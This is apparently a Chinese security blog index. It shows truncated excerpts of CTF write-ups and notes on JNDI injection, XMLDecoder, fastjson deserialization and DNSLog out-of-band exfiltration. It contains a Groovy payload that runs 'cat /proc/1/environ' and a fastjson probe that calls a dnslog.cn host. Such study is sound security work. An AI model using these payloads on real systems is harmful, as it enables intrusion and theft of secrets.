网安

1. 修改成 pdf 文件后发现需要删除那个爬的文件： 我们 可以用 word 文档打开这个 pdf 文件删除： 0x77637466323032307b746831735f31735f405f7064665f616e645f7930755f63616e5f7573655f70686f7430736830707d 转换一下

iiso 文件可以先看一下他是什么文件： 是 rar 文件解压：unrar x 1.iso 进入发现很多文件可以直接 grep 寻找： grep flag *可以找到一个 inf 文件有一个提示是自动运行的是副本 32，可能有我们需要的东西，找一下 grep -oiaP 'flag{[^}]+}' "./autoflag - 副本 (32).exe"说明 -o 只输出匹配到的片段 -i 忽略大小写 -a 把二进制文件当文本扫 -P 启用 Perl 正则，直接捕获最常见的...

SXMgdGhpcyBiYXNlPw== 解码后：Is this base? base...

def proc = this.class.classLoader.loadClass("java.lang.Runtime").getRuntime().exec("cat /proc/1/environ") proc.text

# XMLDecoder/XMLEncoder XMLDecoder/Encoder 是在 JDK1.4 版中添加的 XML 格式序列化持久型方案，可以比较使用 Json 格式序列化的 FastJson 库。 使用 XMLEncoder 来生成表示 JavaBeans 组件（bean）的 XML 文档，用 XMLDecoder 读取使用 XMLEncoder 创建的 XML 文档获取 JAVAbeans. # XMLEncoder 示例 # 写入代码： package XMLdecode;import javax.swing.*;import...

# JNDI 注入原理及利用探究 # JNDI 是什么： JNDI (Java Naming and Directory Interface) 是一个应用程序设计的 API，一种标准的 java 命名系统接口。JNDI 提供统一的客户端 API，通过不同的访问提供者接口 JNDI 服务供应接口（SPI）的实现，由管理者将 JNDIAPI 映射为特定的命名服务和目录系统，是的 java 应用程序可以和这些命名服务和目录服务之间进行交互。 通俗的来说就是若程序定义了 JNDI 的接口，就可以通过该接口 API 访问系统的命令服务和目录服务，如下图 这里主要探究的时 LADP，RMI，DNS...

# DNSLog 外带复现 # DNS： DNS 就是域名系统，负责把域名转换成 IP 地址；例如像浏览其访问 a.com，浏览器就会将其解析成真实的 IP 访问 # DNSlog： DNS 的日志，DNS 在域名解析时会留下域名和解析 IP 的记录 # DNSLog 外带原理： DNS 在解析是会留下日志，我们将信息放在高级域名中，传递到自己这里，然后通过读日志来获取信息。 所以这里跟最初的猜想基本一致，原理也就是通过 DNS 请求后，通过读取日志来获取我们的请求信息。 # mysql # load_file 前置条件: 1. 首先有注入点 2. 需要有 root 权限 3....

# java 反序列化 漏洞挖掘： 1. 找到发送 JSON 序列化数据的接口 2 判断是否使用 fastjson 非法格式报错 {"x":" 2) 使用 dnslog 探测 {"x":{"@type":"java.net.Inet4Address","val":"xxx.dnslog.cn")} Burp...

title: YLctf2024 date: 2024-10-28 19:23:59 tags: [sql 的 join, php 反序列化，xml 文件上传] categories: [比赛复现] # 简单 ：pExpl 源码： <?phperror_reporting(0);class FileHandler { private $fileHandle; private $fileName; public function __construct($fileName, $mode = 'r') {...